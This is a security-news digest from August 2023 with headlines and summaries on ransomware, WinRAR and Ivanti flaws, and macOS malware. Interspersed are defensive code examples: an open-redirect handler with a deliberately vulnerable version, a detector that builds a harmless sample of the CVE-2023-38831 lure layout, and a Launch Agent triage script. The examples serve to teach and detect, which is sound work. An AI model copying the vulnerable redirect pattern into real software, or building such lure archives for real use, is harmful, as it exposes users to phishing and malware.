            Autosummary: Interesting patterns also emerge when looking at Sophos data concerning days and times, indicating that threat actors, including ransomware operators, prefer to hit organizations on Tuesdays, Wednesdays, and Thursdays. "


            New Whiffy Recon malware uses WiFi to triangulate your location

            exploits
            2023-08-24 https://www.bleepingcomputer.com/news/security/new-whiffy-recon-malware-uses-wifi-to-triangulate-your-location/
            Cybercriminals behind the Smoke Loader botnet are using a new piece of malware called Whiffy Recon to triangulate the location of infected devices through WiFi scanning and Google's geolocation API. [...] "

            Autosummary: "


            Exploit released for Ivanti Sentry bug abused as zero-day in attacks

            exploits
            2023-08-24 https://www.bleepingcomputer.com/news/security/exploit-released-for-ivanti-sentry-bug-abused-as-zero-day-in-attacks/
            Proof-of-concept exploit code is now available for a critical Ivanti Sentry authentication bypass vulnerability that enables attackers to execute code remotely as root on vulnerable systems. [...] "

            Autosummary: "


            Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware

            exploits
            2023-08-24 https://thehackernews.com/2023/08/lazarus-group-exploits-critical-zoho.html
            The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis. "

            Autosummary: " The activity, detected in early 2023, involved the exploitation of CVE-2022-47966, a mere five days after proof-of-concept (PoC) code for the flaw emerged online, to directly deploy the QuiteRAT binary from a malicious URL. "


            Malwarebytes acquires Cyrus Security

            exploits
            2023-08-24 https://www.malwarebytes.com/blog/personal/2023/08/malwarebytes-acquires-cyrus-security

            Categories: Personal

            Cybersecurity isn't limited to defending against malware anymore; it's about ensuring your entire digital identity remains unscathed and your private details remain private.

            "

            Autosummary: Cyrus Security's skills, expertise and technology will complement Malwarebytes' advanced threat detection and remediation capabilities in a number of exciting ways: Mobile security expertise. One of the standout aspects of Cyrus Security is its unparalleled expertise in mobile user experience. "


            How the downmarket impacted enterprise cybersecurity budgets

            ciber
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/enterprise-cybersecurity-budgets-video/

            Belts have tightened, and ROI and cost reduction are now driving CISO decision-making more than ever. In this Help Net Security video, Sara Behar, Content Manager at YL Ventures, discusses how enterprise cybersecurity budgets have been impacted by the downmarket and how vendors can adapt.

            "

            Autosummary: "


            Anticipating the next wave of IoT cybersecurity challenges

            industry ciber
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/roland-atoui-red-alert-labs-interconnected-iot-environment/

            In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. Atoui also delves into the urgency for standardization, the threat of cascade failures, and the blurred lines of accountability among stakeholders. Given the transition from siloed IoT devices to interconnected IoT environments, what are the main challenges … More

            "

            Autosummary: This layered scrutiny reinforces the collective resilience of the entire IoT environment, addressing the multifaceted challenges of interoperability, security, and installation, and ultimately setting a benchmark in cybersecurity excellence. A comprehensive understanding of the interaction between hardware, software, and human actors helps in creating a coherent, unified security strategy. "


            Cybercriminals turn to AI to bypass modern email security measures

            ciber
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/ai-enabled-email-threats/

            Cybercriminals employ artificial intelligence (AI) to create complex email threats like phishing and business email compromise (BEC) attacks, while modern email security systems use AI to counter these attacks, according to Perception Point and Osterman Research. AI's role in email security: The new study reveals a substantial shift in the perception of AI's role in email security. Cybercriminals have shown rapid adoption of AI tools in their favor, with 91.1% of organizations reporting that they … More

            "

            Autosummary: AI-powered security is not just for email: Buyers of AI-enabled email security want the ability to better protect other communication and collaboration apps, such as Microsoft Teams, SharePoint, OneDrive, Zoom, and Slack, Salesforce, and more, with AI. "


            BlackCat ransomware gang claims credit for Seiko data breach

            financial exploits ransomware
            2023-08-23 https://grahamcluley.com/blackcat-ransomware-gang-claims-credit-for-seiko-data-breach/
            The BlackCat ransomware gang has claimed credit for a cybersecurity attack against Japanese watchmaker Seiko. BlackCat (also known as ALPHV) posted on its dark web leak site what it claims are files stolen from Seiko's servers. "

            Autosummary: "


            Open redirect flaws increasingly exploited by phishers

            exploits
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/open-redirect-phishing/

            Phishing attacks using open redirect flaws are on the rise again, according to Kroll’s Cyber Threat Intelligence (CTI) team, which means organizations should consider refreshing employees’ awareness and knowledge on how to spot them. Malicious URL redirection: Open redirect vulnerabilities in web applications allow threat actors to manipulate legitimate URLs to redirect victims to an external malicious URL. “They occur when a website allows for user-supplied input as part of a URL parameter in a … More

            "

            Autosummary: "
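
The mechanism Kroll describes, user-supplied input flowing into a redirect, is easier to see in code. The following is an added example, not code from Kroll's report or the article: a redirect handler that trusts the parameter outright next to a hardened version that accepts only same-origin paths or an allow-listed HTTPS host. The parameter name `next`, the allow-listed hostnames and the test URLs are assumptions for the illustration.

```python
"""Open redirect: the vulnerable pattern and one way to close it.

Added example. ALLOWED_HOSTS and the `next` parameter are assumptions; the
rejection cases cover the usual bypasses of naive "starts with /" checks.
"""
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.example.com", "login.example.com"}  # assumed for the example


def vulnerable_redirect_target(next_param):
    """Classic open redirect: whatever ?next= says is where the user goes."""
    return next_param or "/"


def safe_redirect_target(next_param, default="/"):
    """Return a redirect target that stays on our origin or an allow-listed host.

    Rejects absolute URLs to other hosts, protocol-relative "//evil", backslash
    variants that browsers normalise to "/", non-https schemes (including
    "javascript:"), userinfo tricks ("https://good@evil"), and control characters.
    """
    if not next_param or any(ord(c) < 0x20 or c == "\x7f" for c in next_param):
        return default
    candidate = next_param.replace("\\", "/")  # browsers treat "\" as "/"
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: only https to a known host survives.
        # parts.hostname is the real host even when userinfo ("user@") is present.
        if parts.scheme.lower() != "https" or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(parts)
    # Relative URL: must be a single-slash absolute path; "//host" is not a path.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate


if __name__ == "__main__":
    for probe in ["/account", "//evil.example/x", "/\\evil.example",
                  "https://evil.example/", "https://www.example.com/dash",
                  "javascript:alert(1)", "https://www.example.com@evil.example/"]:
        print(f"{probe!r:45} -> {safe_redirect_target(probe)!r}")
```

The allow-list, not the string checks, is what makes this safe: every rejected case above is a way of making a URL look relative or local to a prefix check while the browser resolves it elsewhere.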


            Spacecolon Toolset Fuels Global Surge in Scarab Ransomware Attacks

            exploits ransomware
            2023-08-23 https://thehackernews.com/2023/08/spacecolon-toolset-fuels-global-surge.html
            A malicious toolset dubbed Spacecolon is being deployed as part of an ongoing campaign to spread variants of the Scarab ransomware across victim organizations globally. "It probably finds its way into victim organizations by its operators compromising vulnerable web servers or via brute forcing RDP credentials," ESET security researcher Jakub Souček said in a detailed technical write-up "

            Autosummary: The primary component of Spacecolon is ScHackTool, a Delphi-based orchestrator that's used to deploy an installer, which, as the name implies, installs ScService, a backdoor with features to execute custom commands, download and execute payloads, and retrieve system information from compromised machines. "


            WinRAR zero-day exploited since April to hack trading accounts

            exploits
            2023-08-23 https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
            A WinRAR zero-day vulnerability tracked as CVE-2023-38831 was actively exploited to install malware when clicking on harmless files in an archive, allowing the hackers to breach online cryptocurrency trading accounts. [...] "

            Autosummary: The zero-day was fixed in WinRAR version 6.23, released on August 2, 2023, which also resolves several other security issues, including CVE-2023-40477, a flaw that can trigger command execution upon opening a specially crafted RAR file. "


            Malwarebytes releases EDR Extra Strength for endpoint protection

            exploits
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/malwarebytes-edr-extra-strength/

            Malwarebytes is revolutionizing endpoint protection for IT constrained businesses with EDR Extra Strength, a new solution that combines the company’s deep historical threat intelligence knowledge with endpoint detection and response (EDR) and AI-driven tools for attack surface reduction and accelerated response. Even with standard endpoint security deployments, successful attacks are rampant — 83% of organizations have had more than one data breach and 71% of organizations were impacted by ransomware last year. EDR Extra Strength … More

            "

            Autosummary: Alert prioritization, which filters, prioritizes and categorizes alerts; step-by-step guidance for addressing and resolving critical issues. “Good enough has proven not enough to protect organizations from today’s threat landscape which has become so complex that the majority of alerts generated by traditional EDR solutions are ignored,” said Marcin Kleczynski, CEO, Malwarebytes. "


            Bogus OfficeNote app delivers XLoader macOS malware

            exploits
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/xloader-macos-officenote/

            A new macOS-specific variant of the well-known XLoader malware is being delivered disguised as the “OfficeNote” app. “Multiple submissions of this sample have appeared on VirusTotal throughout July, indicating that the malware has been widely distributed in the wild,” SentinelOne researchers said. The new XLoader macOS malware variant: XLoader is a malware-as-a-service infostealer and botnet that has been active since 2015, but first appeared as a macOS variant in 2021, written in Java. “The … More

            "

            Autosummary: The new XLoader macOS malware variant: XLoader is a malware-as-a-service infostealer and botnet that has been active since 2015, but first appeared as a macOS variant in 2021, written in Java. "


            Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware

            exploits
            2023-08-23 https://thehackernews.com/2023/08/syrian-threat-actor-evlf-unmasked-as.html
            A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT. "These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," cybersecurity firm Cyfirma said in a report published last week. CypherRAT and CraxsRAT are said to be offered to other cybercriminals as "

            Autosummary: " The Android malware also requests victims to grant it permissions to Android's accessibility services, allowing it to harvest a wealth of information that would be valuable to cyber criminals, including call logs, contacts, external storage, location, and SMS messages. "


            Hosting firm says it lost all customer data after ransomware attack

            exploits ransomware
            2023-08-23 https://www.bleepingcomputer.com/news/security/hosting-firm-says-it-lost-all-customer-data-after-ransomware-attack/
            Danish hosting firms CloudNordic and AzeroCloud have suffered ransomware attacks, causing the loss of the majority of customer data and forcing the hosting providers to shut down all systems, including websites, email, and customer sites. [...] "

            Autosummary: "Since we neither can nor wish to meet the financial demands of the criminal hackers for a ransom, CloudNordic's IT team and external experts have been working intensively to assess the damage and determine what could be recovered," reads CloudNordic's statement (machine translated). "Sadly, it has been impossible to recover more data, and the majority of our customers have consequently lost all their data with us. "


            Attackers exploited WinRAR zero-day for months to steal money from brokers (CVE-2023-38831)

            financial exploits
            2023-08-23 https://www.helpnetsecurity.com/2023/08/23/cve-2023-38831-exploited/

            Financially motivated attackers have exploited a zero-day vulnerability in WinRAR (CVE-2023-38831) to trick traders into installing malware that would allow them to steal money from broker accounts. “This vulnerability has been exploited since April 2023,” says Group-IB malware analyst Andrey Polovinkin. Devices of at least 130 traders (and likely more) have been infected with malware in this campaign. CVE-2023-38831 exploited: CVE-2023-38831 is a file extension spoofing vulnerability, which allowed attackers to create a modified RAR or … More

            "

            Autosummary: The decoy file is opened, too, to complete the illusion, but in the background DarkMe, GuLoader, and/or Remcos RAT malware gets quietly installed, thus allowing attackers to remotely access the victim’s computer. "
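
The three CVE-2023-38831 items above (Group-IB's findings via The Hacker News, BleepingComputer and Help Net Security) describe the same layout: a harmless-looking decoy file sits next to a folder of the same name, and the folder holds a script with a matching name; vulnerable WinRAR runs the script when the user opens the decoy. A static triage check for that shape follows, as an added example that is not code from Group-IB or RARLAB. ZIP is used because Python's standard library reads it; the same name-collision logic applies to RAR listings. The file names are assumptions, and the sample archive is constructed in memory with a script that only echoes text.

```python
"""Static triage for archives shaped like the CVE-2023-38831 lures.

Reported shape: top-level decoy "report.jpg " (note the trailing space),
a folder "report.jpg /" with the same name, and inside it a script such as
"report.jpg .cmd". Added example; names and sample archive are constructed.
"""
import io
import posixpath
import zipfile

SCRIPT_EXTS = {".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".scr", ".lnk", ".com"}


def _base(name):
    # Normalise an entry name: drop a trailing "/" and then the trailing spaces
    # that hide the real extension from the user.
    return name.rstrip("/").rstrip()


def scan_zip(data):
    """Return findings for top-level files whose name collides with a folder name."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    files = {info.filename for info in infos if not info.is_dir()}
    dirs = {info.filename.rstrip("/") for info in infos if info.is_dir()}
    # Folders may exist only implicitly (no directory entry), so derive them too.
    for name in files:
        parent = posixpath.dirname(name)
        if parent:
            dirs.add(parent)

    for fname in files:
        if posixpath.dirname(fname):
            continue  # only a top-level decoy is what the victim double-clicks
        for dname in dirs:
            if _base(dname) != _base(fname):
                continue
            children = [n for n in files if posixpath.dirname(n) == dname]
            scripts = [n for n in children
                       if posixpath.splitext(n.rstrip())[1].lower() in SCRIPT_EXTS]
            findings.append({
                "decoy": fname,
                "folder": dname + "/",
                "scripts": scripts,
                "trailing_space": fname != fname.rstrip() or dname != dname.rstrip(),
            })
    return findings


def is_suspicious(data):
    """True when a decoy/folder collision has at least one script-like child."""
    return any(f["scripts"] for f in scan_zip(data))


def build_sample_archive():
    """Constructed ZIP in the reported layout; the 'script' only echoes text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.jpg ", b"\xff\xd8\xff\xe0 not really a jpeg")
        zf.writestr("report.jpg /", b"")
        zf.writestr("report.jpg /report.jpg .cmd", b"@echo off\r\necho harmless sample\r\n")
    return buf.getvalue()


def build_benign_archive():
    """Constructed ZIP with an image and a folder that do not share a name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.jpg", b"\xff\xd8\xff\xe0 plain")
        zf.writestr("notes/readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("sample", build_sample_archive()), ("benign", build_benign_archive())):
        print(label, is_suspicious(blob), scan_zip(blob))
```

Run this on mail-gateway attachments or a quarantine share; a hit is a strong indicator regardless of whether the recipient's WinRAR is already at 6.23, because the lure itself is unambiguous.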


            Lapsus$ teen hackers convicted of high-profile cyberattacks

            ciber
            2023-08-23 https://www.bleepingcomputer.com/news/security/lapsus-teen-hackers-convicted-of-high-profile-cyberattacks/
            A London jury has found that an 18-year-old member of the Lapsus$ data extortion gang helped hack multiple high-profile companies, stole data from them, and demanded a ransom threatening to leak the information. [...] "

            Autosummary: High-profile organizations impacted by Lapsus$ also include Microsoft, Cisco, Okta, Nvidia, T-Mobile, Samsung, Vodafone, Ubisoft, 2K, and Globant. "


            Discord starts notifying users affected by March data breach

            financial
            2023-08-23 https://www.bleepingcomputer.com/news/security/discord-starts-notifying-users-affected-by-march-data-breach/
            Starting on Monday, Discord has been reaching out to users affected by a data breach disclosed earlier this year to let them know what Personal Identifying Information (PII) was exposed in the incident. [...] "

            Autosummary: Sensitive data compromised in the breach includes Discord.io members' usernames, email addresses, billing addresses (of a limited number of individuals), salted and hashed passwords (affecting a limited number of individuals), and their respective Discord IDs. "


            Ivanti Sentry critical vulnerability—don't play dice, patch

            exploits
            2023-08-23 https://www.malwarebytes.com/blog/news/2023/08/ivanti-sentry-critical-authentication-bypass-vulnerability-could-be-subject-to-active-exploitation

            Categories: Exploits and vulnerabilities, News

            Tags: Ivanti, Sentry, MobileIron, CVE-2023-38035, MICS, port 8443

            There is some uncertainty about whether a vulnerability in Ivanti Sentry is being exploited in the wild, but why take the risk when you can patch?

            "

            Autosummary: A remote, unauthenticated attacker could exploit this vulnerability to change configuration files, run system commands, or write files to the system. "


            Adobe ColdFusion vulnerability exploited in the wild

            exploits
            2023-08-23 https://www.malwarebytes.com/blog/news/2023/08/adobe-coldfusion-vulnerability-exploited-in-the-wild

            Categories: Exploits and vulnerabilities, News

            Tags: Adobe, ColdFusion, CVE-2023-26359, CVE-2023-26360, critical, known exploited, deserialization

            A second Adobe ColdFusion vulnerability that was patched in April has been added to CISA's known exploited vulnerabilities catalog.

            "

            Autosummary: To successfully remediate against this vulnerability the latest updates for ColdFusion should be applied, specifically ColdFusion 2021 Update 6 or later, or ColdFusion 2018 Update 16 or later. Another critical vulnerability tackled in this update is CVE-2023-26360, an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. "


            Understanding how attackers exploit APIs is more important than ever

            exploits
            2023-08-22 https://www.helpnetsecurity.com/2023/08/22/how-attackers-exploit-apis-video/

            In this Help Net Security video, Andy Hornegold, Product Lead at Intruder, dives into API security and explores how several recent high-profile breaches were caused by simple failings – which didn’t require sophisticated security to prevent. The number of APIs is increasing year on year as more organizations are building APIs to facilitate automation. As part of that, there’s an increasing attack surface for opportunistic hackers. Knowing where your APIs are and understanding how an … More

            "

            Autosummary: "


            Ivanti Warns of Critical Zero-Day Flaw Being Actively Exploited in Sentry Software

            exploits
            2023-08-22 https://thehackernews.com/2023/08/ivanti-warns-of-critical-zero-day-flaw.html
            Software services provider Ivanti is warning of a new critical zero-day flaw impacting Ivanti Sentry (formerly MobileIron Sentry) that it said is being actively exploited in the wild, marking an escalation of its security woes. Tracked as CVE-2023-38035 (CVSS score: 9.8), the issue has been described as a case of authentication bypass impacting versions 9.18 and prior due to what it called an "

            Autosummary: "


            Critical Adobe ColdFusion Flaw Added to CISA"s Exploited Vulnerability Catalog

            exploits
            2023-08-22 https://thehackernews.com/2023/08/critical-adobe-coldfusion-flaw-added-to.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, cataloged as CVE-2023-26359 (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 ( "

            Autosummary: "


            Seiko joins growing list of ALPHV/BlackCat ransomware victims

            exploits ransomware
            2023-08-22 https://www.helpnetsecurity.com/2023/08/22/seiko-data-breach/

            Japanese watchmaker Seiko has been added to ALPHV (BlackCat) ransomware group’s victim list, following a data breach that occurred in early August. The Seiko data breach: The company published a data breach and response notice on August 10, 2023, stating that an unidentified party gained unauthorized access to at least one of their servers. On August 2, Seiko hired a team of external cybersecurity experts to investigate the data breach. “As a result, we are now … More

            "

            Autosummary: "


            New Variant of XLoader macOS Malware Disguised as "OfficeNote" Productivity App

            exploits
            2023-08-22 https://thehackernews.com/2023/08/new-variant-of-xloader-macos-malware.html
            A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote." "The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application "

            Autosummary: " Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence. "
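
Both XLoader/OfficeNote items on this page end with the same persistence detail: the dropper installs a Launch Agent. A per-user Launch Agent triage in that spirit follows, as an added example that is not SentinelOne's code and does not reproduce the real sample's label or path. It parses LaunchAgent plists and scores the traits a hunter looks at: a program outside /Applications or system paths, a hidden (dot-prefixed) directory, RunAtLoad plus KeepAlive, and a label that does not reference the binary. The plists, labels and paths are constructed.

```python
"""Score ~/Library/LaunchAgents entries for suspicious persistence traits.

Added example. The scoring heuristics are generic; the sample plists, labels
and paths below are constructed and do not describe the real XLoader sample.
"""
import plistlib
import posixpath

TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")
ALERT_THRESHOLD = 3  # number of independent traits before an agent is reported


def agent_program(agent):
    """Program path from either the Program key or ProgramArguments[0]."""
    args = agent.get("ProgramArguments") or []
    return agent.get("Program") or (args[0] if args else "")


def score_agent(agent):
    """Return (score, reasons) for one parsed Launch Agent dictionary."""
    reasons = []
    prog = agent_program(agent)
    label = str(agent.get("Label", ""))
    if not prog:
        return 0, ["no program"]
    if not prog.startswith(TRUSTED_PREFIXES):
        reasons.append("program outside trusted paths: " + prog)
    if any(part.startswith(".") for part in prog.split("/") if part):
        reasons.append("hidden path component")
    if agent.get("RunAtLoad") and agent.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (restarts if killed)")
    binary_stem = posixpath.basename(prog).split(".")[0].lower()
    if label and binary_stem not in label.lower():
        reasons.append("label does not reference the binary")
    return len(reasons), reasons


def score_blob(blob):
    """Parse raw plist bytes and score them."""
    return score_agent(plistlib.loads(blob))


def triage_plists(plist_blobs):
    """Return (name, score, reasons) for agents at or above the threshold, highest first."""
    results = []
    for name, blob in plist_blobs.items():
        score, reasons = score_blob(blob)
        if score >= ALERT_THRESHOLD:
            results.append((name, score, reasons))
    return sorted(results, key=lambda r: -r[1])


# Constructed samples: one dropper-style agent, one ordinary vendor agent.
SAMPLE_PLISTS = {
    "com.update.helper.plist": plistlib.dumps({
        "Label": "com.update.helper",
        "ProgramArguments": ["/Users/alice/.cache/73a1f/OfficeNote"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "com.example.sync.plist": plistlib.dumps({
        "Label": "com.example.sync",
        "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync", "--daemon"],
        "RunAtLoad": True,
    }),
}

if __name__ == "__main__":
    for name, score, reasons in triage_plists(SAMPLE_PLISTS):
        print(f"{name}: score {score}")
        for r in reasons:
            print("  -", r)
```

On a live host, feed it the bytes of each file in ~/Library/LaunchAgents and /Library/LaunchAgents; binary plists parse the same way through plistlib.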


            Ivanti Sentry zero-day vulnerability fixed, patch ASAP! (CVE-2023-38035)

            exploits
            2023-08-22 https://www.helpnetsecurity.com/2023/08/22/cve-2023-38035/

            Ivanti is urging administrators of Ivanti Sentry (formerly MobileIron Sentry) gateways to patch a newly discovered vulnerability (CVE-2023-38035) that could be exploited to change configuration, run system commands, or write files onto the vulnerable system. “As of now, we are only aware of a limited number of customers impacted by CVE-2023-38035,” the company said in the advisory, but it has yet to clarify whether that means detected exploitation attempts or simply vulnerable installations reachable via the internet. … More

            "

            Autosummary: As the Mnemonic researchers explained, “Ivanti Sentry is a server in an Ivanti deployment that serves as a gatekeeper between mobile devices and a company’s ActiveSync server, such as a Microsoft Exchange Server, or with a backend resource such as a Sharepoint server, or it can be configured as a Kerberos Key Distribution Center Proxy (KKDCP) server. "


            CISOs Tout SaaS Cybersecurity Confidence, But 79% Admit to SaaS Incidents, New Report Finds

            ciber
            2023-08-22 https://thehackernews.com/2023/08/cisos-tout-saas-cybersecurity.html
            A new State of SaaS Security Posture Management Report from SaaS cybersecurity provider AppOmni indicates that Cybersecurity, IT, and business leaders alike recognize SaaS cybersecurity as an increasingly important part of the cyber threat landscape. And at first glance, respondents appear generally optimistic about their SaaS cybersecurity. Over 600 IT, cybersecurity, and business leaders at "

            Autosummary: Lack of SaaS compliance monitoring presents further risk to organizations operating in advanced economies. [Figure: Global Compliance Requirements, image courtesy of AppOmni] Maintaining compliance with regional and international regulations such as GDPR, HIPAA, CCPA, APPI, and industry-specific standards also proved challenging for the research study participants. With a cohort based in North America (U.S.), Europe (UK, France, and Germany), and APAC (Japan and Australia), abiding by legislation that carries stiff fines and consequences for noncompliance should be a top cybersecurity priority. [Figure: SaaS Cybersecurity Incidents in the Last 12 Months (June 2023), image courtesy of AppOmni] The SaaS footprint, and its corresponding risk, is grossly underestimated: critical operations in both SMBs and the enterprise increasingly rely on cloud and SaaS infrastructure. Misreading the SaaS cyber threat model: while SaaS-to-SaaS (sometimes called third-party integrations or third-party apps) connections are a boon to productivity, they're a bane to security. A properly resourced SaaS cybersecurity program will reduce the risk of SaaS-related data breaches, scale SaaS cybersecurity as organizational usage grows, automate compliance and risk reporting, and realize cost savings and operational efficiencies across the SaaS estate. For example: when asked to rate the SaaS cybersecurity maturity level of their organizations, 71% noted that their organizations' SaaS cybersecurity maturity has achieved either a mid-high level (43%) or the highest level (28%). "


            New HiatusRAT malware attacks target US Defense Department

            exploits
            2023-08-22 https://www.bleepingcomputer.com/news/security/new-hiatusrat-malware-attacks-target-us-defense-department/
            In a new HiatusRAT malware campaign, threat actors have targeted a server belonging to the U.S. Department of Defense in what researchers described as a reconnaissance attack. [...] "

            Autosummary: [Figure: New HiatusRAT campaign (Lumen Black Lotus Labs)] This campaign follows an earlier series of attacks where over a hundred businesses, mainly from Europe, North America, and South America, were infected with HiatusRAT to create a covert proxy network. "


            Akira ransomware targets Cisco VPNs to breach organizations

            exploits ransomware
            2023-08-22 https://www.bleepingcomputer.com/news/security/akira-ransomware-targets-cisco-vpns-to-breach-organizations/
            There's mounting evidence that Akira ransomware targets Cisco VPN (virtual private network) products as an attack vector to breach corporate networks, steal, and eventually encrypt data. [...] "

            Autosummary: [Figure: Cisco VPN trait seen in eight Akira attacks (source: SentinelOne)] Remote RustDesk access: additionally, SentinelOne's analysts observed Akira using the RustDesk open-source remote access tool to navigate compromised networks, making them the first ransomware group known to abuse the software. "


            Update now! WinRAR files can be abused to run malware

            exploits
            2023-08-22 https://www.malwarebytes.com/blog/news/2023/08/update-now-winrar-code-execution-upon-opening-file-vulnerability

            Categories: Exploits and vulnerabilities, News

            Tags: WinRAR, CVE-2023-40477, RCE, Windows 11

            A new version of WinRAR is available that patches two vulnerabilities attackers could use for remote code execution.

            "

            Autosummary: “We have added native support for additional archive formats, including tar, 7-zip, rar, gz and many others using the libarchive open-source project.” Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Users of a cracked version of the software, which is probably another big group of users, will not be able to install the latest version right off the shelf, so they may remain vulnerable as well. "


            How EU lawmakers can make mandatory vulnerability disclosure responsible

            exploits
            2023-08-21 https://www.helpnetsecurity.com/2023/08/21/vulnerability-disclosure/

            There is a standard playbook and best practice for when an organization discovers or is notified about a software vulnerability: The organization works quickly to fix the problem and, once a fix is available, discloses that vulnerability for the benefit of the community. This playbook is not always perfect, but it strikes a reasonable compromise between providing time to fix a vulnerability and disseminating that knowledge to help prevent similar vulnerabilities in the future. The … More

            "

            Autosummary: Under the CRA (in its current form), this is how the reporting requirement would work: when a manufacturer identifies an actively exploited vulnerability, the manufacturer has 24 hours to report it to the European Union Agency for Cybersecurity (ENISA). But the CRA may have a chilling effect on this kind of good-faith security research, and businesses may decide to take an ignorance-is-bliss approach: after all, if an ethical hacker does surface an unpatched vulnerability, the company will have to report it to ENISA with all the potential risks associated. "


            HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack

            exploits
            2023-08-21 https://thehackernews.com/2023/08/hiatusrat-malware-resurfaces-taiwan.html
            The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report "

            Autosummary: The latest set of attacks, observed from mid-June through August 2023, entail the use of pre-built HiatusRAT binaries specifically designed for Arm, Intel 80386, and x86-64 architectures, alongside MIPS, MIPS64, and i386. "


            New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC

            exploits
            2023-08-21 https://thehackernews.com/2023/08/new-winrar-vulnerability-could-allow.html
            A high-severity security flaw has been disclosed in the WinRAR utility that could be potentially exploited by a threat actor to achieve remote code execution on Windows systems. Tracked as CVE-2023-40477 (CVSS score: 7.8), the vulnerability has been described as a case of improper validation while processing recovery volumes. "The issue results from the lack of proper validation of user-supplied "

            Autosummary: "


            This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers

            exploits
            2023-08-21 https://thehackernews.com/2023/08/this-malware-turned-thousands-of-hacked.html
            Threat actors are leveraging access to malware-infected Windows and macOS machines to deliver a proxy server application and use them as exit nodes to reroute proxy requests. According to AT&T Alien Labs, the unnamed company that offers the proxy service operates more than 400,000 proxy exit nodes, although it's not immediately clear how many of them were co-opted by malware installed on "

            Autosummary: Romanian cybersecurity company Bitdefender, in its own macOS Threat Landscape Report, said that Mac users are predominantly targeted by three key threats in the past year: Trojans (51.8%), Potentially Unwanted Applications (25.3%), and Adware (22.6%). "


            Sneaky Amazon Google ad leads to Microsoft support scam

            financial
            2023-08-21 https://www.bleepingcomputer.com/news/security/sneaky-amazon-google-ad-leads-to-microsoft-support-scam/
            A legitimate-looking ad for Amazon in Google search results redirects visitors to a Microsoft Defender tech support scam that locks up their browser. [...] "

            Autosummary: "


            Ivanti warns of new actively exploited MobileIron zero-day bug

            exploits
            2023-08-21 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-actively-exploited-mobileiron-zero-day-bug/
            US-based IT software company Ivanti warned customers today that a critical Sentry API authentication bypass vulnerability is being exploited in the wild. [...] "

            Autosummary: One week ago, Ivanti also fixed two critical stack-based buffer overflows tracked as CVE-2023-32560 in its Avalanche software, an enterprise mobility management (EMM) solution, that could lead to crashes and arbitrary code execution following exploitation. "


            Japanese watchmaker Seiko breached by BlackCat ransomware gang

            exploits ransomware
            2023-08-21 https://www.bleepingcomputer.com/news/security/japanese-watchmaker-seiko-breached-by-blackcat-ransomware-gang/
            The BlackCat/ALPHV ransomware gang has added Seiko to its extortion site, claiming responsibility for a cyberattack disclosed by the Japanese firm earlier this month. [...] "

            Autosummary: For example, the group was the first to use a clearweb website dedicated to leaking data for a particular victim and, more recently, created a data leak API, allowing for easier distribution of stolen data. "


            Google Chrome to warn when installed extensions are malware

            exploits
            2023-08-20 https://www.bleepingcomputer.com/news/google/google-chrome-to-warn-when-installed-extensions-are-malware/
            Google is testing a new feature in the Chrome browser that will warn users when an installed extension has been removed from the Chrome Web Store, usually indicative of it being malware. [...] "

            Autosummary: Figure: Potentially malicious extensions removed from Chrome Web Store (Source: Google). Google says that extensions can be removed from the Chrome Web Store because they were unpublished by the developer, violated policies, or were detected as malware. "


            Cuba ransomware uses Veeam exploit against critical U.S. organizations

            exploits ransomware
